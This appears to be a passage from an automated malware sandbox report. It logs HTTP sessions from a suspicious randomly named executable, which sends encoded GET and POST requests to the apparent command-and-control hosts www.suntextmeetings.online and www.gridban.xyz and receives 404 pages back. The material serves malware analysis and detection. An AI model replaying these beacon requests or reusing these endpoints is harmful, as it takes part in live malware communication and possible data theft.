                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          24192.168.2.555162148.66.138.133807156C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 26, 2024 18:47:38.712620974 CEST476OUTGET /1wd4/?1Hg=ScHcXTKAO5eSE6uaWkYIjyQnfQ68P9tZ9TtcMsVrul6RoGZN9pvJIdRIgUxQy3rdaSGeQ+CIaUiYSa72rbvJ1wEunXVWpcUP89m8x1dRGPimMbT7bK/R3/HUlg93LDGrxg==&ejlto=QtkhctgpxJahPP0 HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.5
                                                          Connection: close
                                                          Host: www.suntextmeetings.online
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Jul 26, 2024 18:47:39.672660112 CEST479INHTTP/1.1 404 Not Found
                                                          Date: Fri, 26 Jul 2024 16:47:39 GMT
                                                          Server: Apache
                                                          Content-Length: 315
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          25192.168.2.555163162.254.38.56807156C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 26, 2024 18:47:44.784499884 CEST710OUTPOST /hheq/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate
                                                          Accept-Language: en-US,en;q=0.5
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Content-Length: 204
                                                          Host: www.gridban.xyz
                                                          Origin: http://www.gridban.xyz
                                                          Referer: http://www.gridban.xyz/hheq/
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Raw: 31 48 67 3d 44 53 76 44 51 2b 45 79 6a 4d 30 52 33 4d 39 4a 36 52 70 75 79 69 46 38 68 34 48 67 77 59 41 4c 41 66 65 53 51 65 44 6a 6d 44 78 45 52 54 6e 36 63 48 63 61 6b 79 4d 74 4c 32 50 74 6c 48 50 77 4c 42 49 36 68 35 75 55 52 39 39 65 46 65 38 54 32 35 33 31 43 42 4a 38 4f 61 46 35 5a 51 33 42 36 6e 5a 7a 38 71 43 52 47 42 46 53 64 42 6f 31 48 63 76 75 6a 63 38 4e 54 51 32 65 4e 76 66 4d 37 41 6d 45 45 4d 57 33 6d 32 44 5a 32 59 56 68 48 79 77 75 78 4e 46 53 76 58 64 31 67 54 2f 53 6c 5a 44 6f 75 55 58 68 5a 35 32 31 46 37 66 41 52 34 7a 68 65 77 73 5a 46 36 4a 70 4b 33 5a 61 7a 6d 33 32 50 5a 30 3d
                                                          Data Ascii: 1Hg=DSvDQ+EyjM0R3M9J6RpuyiF8h4HgwYALAfeSQeDjmDxERTn6cHcakyMtL2PtlHPwLBI6h5uUR99eFe8T2531CBJ8OaF5ZQ3B6nZz8qCRGBFSdBo1Hcvujc8NTQ2eNvfM7AmEEMW3m2DZ2YVhHywuxNFSvXd1gT/SlZDouUXhZ521F7fAR4zhewsZF6JpK3Zazm32PZ0=
                                                          Jul 26, 2024 18:47:45.465374947 CEST1236INHTTP/1.1 404 Not Found
                                                          Date: Fri, 26 Jul 2024 16:47:45 GMT
                                                          Server: Apache
                                                          Content-Length: 16052
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                          Jul 26, 2024 18:47:45.465393066 CEST1236INData Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                                                          Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
                                                          Jul 26, 2024 18:47:45.465401888 CEST448INData Raw: 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d
                                                          Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
                                                          Jul 26, 2024 18:47:45.467727900 CEST1236INData Raw: 36 38 31 31 33 20 2d 31 2e 33 35 35 38 35 33 2c 31 2e 35 30 33 31 32 20 2d 32 2e 34 37 33 37 36 34 2c 33 2e 30 39 31 37 33 20 2d 33 2e 33 38 37 38 36 36 2c 34 2e 35 39 35 33 38 20 2d 30 2e 39 31 34 31 30 33 2c 31 2e 35 30 33 36 35 20 2d 31 2e 36
                                                          Data Ascii: 68113 -1.355853,1.50312 -2.473764,3.09173 -3.387866,4.59538 -0.914103,1.50365 -1.620209,2.91586 -2.416229,4.41952 -0.79602,1.50365 -1.67928,3.09352 -0.808656,3.24054 0.870624,0.14702 3.490408,-1.14815 5.700074,-1.91396 2.209666,-0.76581 4.0014
                                                          Jul 26, 2024 18:47:45.467737913 CEST1236INData Raw: 34 39 36 35 35 2c 31 33 2e 36 36 36 30 35 20 2d 31 33 2e 39 31 36 36 30 38 2c 31 38 2e 37 34 39 36 20 2d 33 2e 31 36 36 39 35 32 2c 35 2e 30 38 33 35 35 20 2d 34 2e 33 33 33 34 33 32 2c 38 2e 32 34 39 37 31 20 2d 34 2e 37 35 30 33 31 35 2c 31 31
                                                          Data Ascii: 49655,13.66605 -13.916608,18.7496 -3.166952,5.08355 -4.333432,8.24971 -4.750315,11.08369 -0.416883,2.83399 -0.08368,5.33304 1.809372,16.25302 1.893048,10.91998 5.343489,30.24673 9.760132,48.66349 4.416642,18.41676 9.798356,35.91675 15.180267,5
                                                          Jul 26, 2024 18:47:45.471170902 CEST1236INData Raw: 37 38 36 2c 36 2e 32 32 39 31 32 20 31 31 2e 36 39 37 38 39 2c 31 32 2e 32 32 39 31 34 20 31 37 2e 31 31 34 35 36 2c 31 38 2e 33 39 35 38 31 20 35 2e 34 31 36 36 36 2c 36 2e 31 36 36 36 37 20 31 30 2e 37 34 39 39 36 2c 31 32 2e 34 39 39 39 35 20
                                                          Data Ascii: 786,6.22912 11.69789,12.22914 17.11456,18.39581 5.41666,6.16667 10.74996,12.49995 14.74993,17.91655 3.99997,5.41659 6.66659,9.91653 7.16671,17.83316 0.50012,7.91664 -1.16644,19.24921 -3.3502,31.24619 -2.18376,11.99698 -4.81616,24.33632 -8.4206
                                                          Jul 26, 2024 18:47:45.471180916 CEST1236INData Raw: 33 2c 32 33 2e 38 30 36 34 37 20 2d 30 2e 35 33 30 33 34 2c 31 34 2e 31 34 33 33 38 20 2d 32 2e 38 38 37 30 36 2c 33 36 2e 35 33 32 32 36 20 2d 35 2e 34 32 30 39 2c 35 36 2e 34 34 39 35 31 20 2d 32 2e 35 33 33 38 33 2c 31 39 2e 39 31 37 32 35 20
                                                          Data Ascii: 3,23.80647 -0.53034,14.14338 -2.88706,36.53226 -5.4209,56.44951 -2.53383,19.91725 -5.24428,37.35836 -7.95503,54.80146" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;strok
                                                          Jul 26, 2024 18:47:45.474961042 CEST1236INData Raw: 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22
                                                          Data Ascii: butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4545" d="m 83.12978,122.92016 c -2.601311,10.56131 -5.214983,21.17282 -7.40283,31.41665 -2.187847,10.24384 -3.955407,20.14218 -5.074975,26.03483
                                                          Jul 26, 2024 18:47:45.474972963 CEST1120INData Raw: 20 33 2e 37 37 30 39 31 36 2c 30 2e 35 33 30 32 34 20 37 2e 38 39 36 35 37 2c 30 2e 37 36 35 39 39 20 31 31 2e 36 30 38 35 33 35 2c 30 2e 38 38 33 38 32 20 33 2e 37 31 31 39 36 35 2c 30 2e 31 31 37 38 32 20 37 2e 30 31 32 35 34 38 2c 30 2e 31 31
                                                          Data Ascii: 3.770916,0.53024 7.89657,0.76599 11.608535,0.88382 3.711965,0.11782 7.012548,0.11782 10.429711,0.0589 3.417163,-0.0589 6.953769,-0.17681 10.606588,-0.23572 3.652818,-0.0589 7.425155,-0.0589 11.137027,-0.23569 3.711875,-0.17679 7.366225,-0.530
                                                          Jul 26, 2024 18:47:45.478755951 CEST1236INData Raw: 20 20 20 20 20 20 20 20 72 78 3d 22 32 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 63 79 3d 22 32 33 38 2e 30 38 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 63 78 3d 22 31 31 39 2e 31 32 32 36 32 22 0a 20 20 20 20 20 20 20 20 20
                                                          Data Ascii: rx="2.5" cy="238.08525" cx="119.12262" id="path4614" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterl
                                                          Jul 26, 2024 18:47:45.478769064 CEST1236INData Raw: 2d 31 38 2e 35 39 34 36 33 2c 32 37 2e 32 34 36 30 36 20 2d 38 2e 33 38 34 37 37 2c 33 2e 37 35 39 20 31 2e 33 35 31 39 39 2c 2d 33 2e 31 31 30 31 36 20 35 2e 36 39 35 31 33 2c 2d 31 32 2e 38 39 38 38 31 20 31 30 2e 35 30 36 30 39 2c 2d 31 35 2e
                                                          Data Ascii: -18.59463,27.24606 -8.38477,3.759 1.35199,-3.11016 5.69513,-12.89881 10.50609,-15.15612 8.05545,-3.77965 6.61702,-3.26121 6.61702,0.1301 z" style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          26192.168.2.555164162.254.38.56807156C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 26, 2024 18:47:47.378555059 CEST730OUTPOST /hheq/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate
                                                          Accept-Language: en-US,en;q=0.5
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Content-Length: 224
                                                          Host: www.gridban.xyz
                                                          Origin: http://www.gridban.xyz
                                                          Referer: http://www.gridban.xyz/hheq/
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Raw: 31 48 67 3d 44 53 76 44 51 2b 45 79 6a 4d 30 52 32 74 4e 4a 38 77 70 75 36 69 46 37 75 59 48 67 35 34 41 50 41 66 43 53 51 66 32 6d 6d 31 5a 45 66 58 6a 36 66 44 49 61 6c 79 4d 74 41 57 50 6f 6f 6e 50 37 4c 42 55 59 68 34 43 55 52 39 35 65 46 65 4d 54 33 4b 50 36 44 52 4a 2b 45 4b 46 2f 58 77 33 42 36 6e 5a 7a 38 70 2b 72 47 41 74 53 64 78 59 31 41 4f 48 74 71 38 38 4d 55 51 32 65 63 2f 66 49 37 41 6d 36 45 4d 6d 64 6d 77 48 5a 32 59 46 68 45 6a 77 70 34 4e 46 51 6c 33 63 43 6c 57 61 42 39 37 50 56 30 31 4f 4a 50 4a 47 34 4e 74 79 71 4c 61 37 4a 4e 51 41 68 56 70 42 65 62 48 34 7a 70 46 6e 47 52 4f 68 6e 39 4c 31 64 65 34 36 6a 79 4b 6e 43 36 65 31 43 5a 54 58 64
                                                          Data Ascii: 1Hg=DSvDQ+EyjM0R2tNJ8wpu6iF7uYHg54APAfCSQf2mm1ZEfXj6fDIalyMtAWPoonP7LBUYh4CUR95eFeMT3KP6DRJ+EKF/Xw3B6nZz8p+rGAtSdxY1AOHtq88MUQ2ec/fI7Am6EMmdmwHZ2YFhEjwp4NFQl3cClWaB97PV01OJPJG4NtyqLa7JNQAhVpBebH4zpFnGROhn9L1de46jyKnC6e1CZTXd
                                                          Jul 26, 2024 18:47:47.980654001 CEST1236INHTTP/1.1 404 Not Found
                                                          Date: Fri, 26 Jul 2024 16:47:47 GMT
                                                          Server: Apache
                                                          Content-Length: 16052
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                          Jul 26, 2024 18:47:47.981376886 CEST1236INData Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                                                          Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
                                                          Jul 26, 2024 18:47:47.981389046 CEST1236INData Raw: 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d
                                                          Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
                                                          Jul 26, 2024 18:47:47.984262943 CEST1236INData Raw: 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66
                                                          Data Ascii: 0.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <pa
                                                          Jul 26, 2024 18:47:47.984273911 CEST1236INData Raw: 32 2c 31 35 2e 35 30 30 36 34 20 30 2e 39 31 36 37 39 38 2c 36 2e 38 33 34 33 34 20 32 2e 32 34 39 38 35 34 2c 31 36 2e 33 33 32 33 37 20 33 2e 34 39 39 39 30 32 2c 32 34 2e 39 31 36 30 34 20 31 2e 32 35 30 30 34 37 2c 38 2e 35 38 33 36 38 20 32
                                                          Data Ascii: 2,15.50064 0.916798,6.83434 2.249854,16.33237 3.499902,24.91604 1.250047,8.58368 2.416611,16.24967 4.583438,28.58394 2.166827,12.33427 5.333153,29.33244 8.499966,46.33323" style="display:inline;fill:none;stroke:#000000;stroke-widt
                                                          Jul 26, 2024 18:47:47.987487078 CEST1236INData Raw: 35 31 2c 31 2e 35 32 31 36 35 20 30 2e 32 32 32 39 39 2c 31 2e 30 36 35 37 39 20 30 2e 31 34 39 33 33 2c 30 2e 36 30 39 31 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c
                                                          Data Ascii: 51,1.52165 0.22299,1.06579 0.14933,0.60912" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4533" d=
                                                          Jul 26, 2024 18:47:47.987498045 CEST1236INData Raw: 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20
                                                          Data Ascii: ke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4541" d="m 85.206367,122.98266 c 0.117841,11.74369 0.235693,23.48835 0.235693,36.55072 -10e-7,13.06238 -0.117833,27.43796 -0.05891,45
                                                          Jul 26, 2024 18:47:47.990753889 CEST1236INData Raw: 2c 32 36 2e 37 30 30 33 33 20 2d 32 2e 32 39 38 33 39 34 2c 36 2e 39 35 33 36 32 20 2d 32 2e 32 39 38 33 39 34 2c 31 31 2e 35 34 39 32 32 20 2d 31 2e 33 35 35 34 31 39 2c 32 34 2e 35 37 34 31 35 20 30 2e 39 34 32 39 37 34 2c 31 33 2e 30 32 34 39
                                                          Data Ascii: ,26.70033 -2.298394,6.95362 -2.298394,11.54922 -1.355419,24.57415 0.942974,13.02493 2.828182,34.46917 5.066095,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-w
                                                          Jul 26, 2024 18:47:47.990765095 CEST1236INData Raw: 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 39 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 31 33 32 2e 36 38 37 35 2c 32 36 33 2e 33
                                                          Data Ascii: 1;" /> <path id="path4529" d="m 132.6875,263.34998 c -4.2289,18.4155 -8.45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-
                                                          Jul 26, 2024 18:47:47.993859053 CEST1236INData Raw: 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 2d 72 75 6c 65 3a 6e 6f 6e 7a 65 72 6f 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 30 30 31 35 37 34 37 35 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72
                                                          Data Ascii: ll-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.038164)" id="path4567"
                                                          Jul 26, 2024 18:47:47.994389057 CEST1236INData Raw: 2c 30 2e 31 31 38 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65
                                                          Data Ascii: ,0.1183" style="fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.038164)" id="path4578-1"


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          27192.168.2.555165162.254.38.56807156C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 26, 2024 18:47:49.961024046 CEST1747OUTPOST /hheq/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate
                                                          Accept-Language: en-US,en;q=0.5
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Content-Length: 1240
                                                          Host: www.gridban.xyz
                                                          Origin: http://www.gridban.xyz
